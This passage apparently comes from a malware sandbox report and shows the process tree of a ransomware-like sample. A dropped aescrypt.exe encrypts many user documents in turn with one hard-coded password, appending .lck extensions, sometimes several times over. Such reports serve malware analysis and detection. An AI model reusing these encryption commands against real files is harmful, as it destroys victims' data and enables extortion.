    PID:2260
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
    3⤵
    - Executes dropped EXE
    PID:2324
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
    3⤵
    - Executes dropped EXE
    PID:2912
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
    3⤵
    - Executes dropped EXE
    PID:2820
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
    3⤵
    - Executes dropped EXE
    PID:2500
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
    3⤵
    PID:3868
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
    3⤵
    PID:2196
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
    3⤵
    PID:256
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
    3⤵
    PID:1344
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
    3⤵
    PID:2272
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
    3⤵
    PID:2456
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
    3⤵
    PID:1400
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
    3⤵
    PID:652
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2492
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:516
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:1376
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
    3⤵
    PID:2212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
    3⤵
    PID:2492
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
    3⤵
    PID:2208
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
    3⤵
    PID:3320
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
    3⤵
    PID:4104
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
    3⤵
    PID:4120
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    PID:4136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    PID:4152
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    PID:4168
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    PID:4200
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
    3⤵
    PID:4216
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
    3⤵
    PID:4232
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
    3⤵
    PID:4248
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
    3⤵
    PID:4264
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
    3⤵
    PID:4280
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
    3⤵
    PID:4296
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
    3⤵
    PID:4312
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck" "LimitBackup.mpp.lck.lck"
    3⤵
    PID:4328
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
    3⤵
    PID:4344
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
    3⤵
    PID:4360
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck" "TraceSave.xlsm.lck.lck"
    3⤵
    PID:4376
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
    3⤵
    PID:4392
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
    3⤵
    PID:4408
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck.lck" "TestOptimize.ppsx.lck.lck"
    3⤵
    PID:4424
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
    3⤵
    PID:4440
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck" "NewMeasure.vstx.lck"
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck.lck.lck" "NewMeasure.vstx.lck.lck"
    3⤵
    PID:4472
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
    3⤵
    PID:4488
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck" "AssertDebug.xlsm.lck"
    3⤵
    PID:4504
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck.lck.lck" "AssertDebug.xlsm.lck.lck"
    3⤵
    PID:4520
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
    3⤵
    PID:4536
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck" "ExpandConfirm.dotx.lck"
    3⤵
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck.lck.lck" "ExpandConfirm.dotx.lck.lck"
    3⤵
    PID:4568
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
    3⤵
    PID:4584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck" "StartProtect.wps.lck"
    3⤵
    PID:4600
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck.lck.lck" "StartProtect.wps.lck.lck"
    3⤵
    PID:4616
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
    3⤵
    PID:4632
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck" "RenameCompare.mpp.lck"
    3⤵
    PID:4648
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck.lck.lck" "RenameCompare.mpp.lck.lck"
    3⤵
    PID:4664
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
    3⤵
    PID:4696
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck" "StartInitialize.pub.lck"
    3⤵
    PID:4712
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck.lck.lck" "StartInitialize.pub.lck.lck"
    3⤵
    PID:4744
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
    3⤵
    PID:4760
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck" "DenyBackup.vstm.lck"
    3⤵
    PID:4776
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck.lck.lck" "DenyBackup.vstm.lck.lck"
    3⤵
    PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4808
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:4820
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:4832
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
    3⤵
    PID:4844
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck.lck" "desktop.ini.lck.lck.lck"
    3⤵
    PID:4856
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
    3⤵
    PID:4872
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
    3⤵
    PID:4884
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
    3⤵
    PID:4896
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
    3⤵
    PID:4908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
    3⤵
    PID:4924
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    PID:4936
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    PID:4948
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    PID:4960
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    PID:4976
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    PID:4992
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck" "These.docx.lck.lck"
    3⤵
    PID:5008
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck" "Are.docx.lck.lck"
    3⤵
    PID:5024
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck" "Recently.docx.lck.lck"
    3⤵
    PID:5040
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck" "Opened.docx.lck.lck"
    3⤵
    PID:5056
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck" "Files.docx.lck.lck"
    3⤵
    PID:5068
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck.lck.lck" "These.docx.lck.lck.lck"
    3⤵
    PID:5084
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck.lck.lck" "Are.docx.lck.lck.lck"
    3⤵
    PID:5100
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck.lck.lck" "Recently.docx.lck.lck.lck"
    3⤵
    PID:5116
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck.lck.lck" "Files.docx.lck.lck.lck"
    3⤵
    PID:1448
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck.lck.lck" "Opened.docx.lck.lck.lck"
    3⤵
    PID:4112
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
    3⤵
    PID:4128
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
    3⤵
    PID:4156
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck" "LimitBackup.mpp.lck.lck"
    3⤵
    PID:4180
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck.lck.lck" "LimitBackup.mpp.lck.lck.lck"
    3⤵
    PID:4192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
    3⤵
    PID:4220
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
    3⤵
    PID:4244
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck" "TraceSave.xlsm.lck.lck"
    3⤵
    PID:4256
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck.lck.lck" "TraceSave.xlsm.lck.lck.lck"
    3⤵
    PID:4284
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
    3⤵
    PID:4308
